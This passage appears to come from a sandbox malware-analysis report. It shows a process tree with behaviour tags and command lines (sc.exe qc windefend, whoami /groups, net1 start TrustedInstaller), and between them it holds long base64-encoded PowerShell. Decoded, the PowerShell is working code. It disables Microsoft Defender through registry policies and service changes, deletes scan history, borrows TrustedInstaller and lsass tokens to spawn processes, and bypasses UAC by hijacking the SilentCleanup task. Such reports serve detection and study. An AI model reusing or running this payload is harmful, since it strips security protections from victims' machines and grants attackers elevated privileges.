DEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3652
        
        C:\Windows\SysWOW64\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2032
        
        C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1056
        
        C:\Windows\SysWOW64\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABN